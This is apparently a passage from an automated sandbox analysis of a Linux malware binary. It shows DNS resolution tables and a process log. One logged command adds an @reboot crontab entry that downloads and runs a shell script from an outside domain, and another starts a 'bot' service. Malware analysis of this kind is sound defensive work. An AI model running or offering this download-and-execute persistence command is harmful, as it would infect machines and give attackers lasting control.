Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:17:53.935691118 CEST | 194.36.144.87 | 192.168.2.15 | 0x3926 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:04.862667084 CEST | 80.152.203.134 | 192.168.2.15 | 0x2510 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 26, 2024 19:18:16.250895023 CEST | 65.21.1.106 | 192.168.2.15 | 0xe882 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /tmp/nsharm7.elf |
Arguments: | /tmp/nsharm7.elf |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /tmp/nsharm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /bin/sh |
Arguments: | /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /tmp/nsharm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /bin/sh |
Arguments: | /bin/sh -c "/sbin/initctl start bot" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /tmp/nsharm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /tmp/nsharm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 17:17:46 |
Start date (UTC): | 26/10/2024 |
Path: | /tmp/nsharm7.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |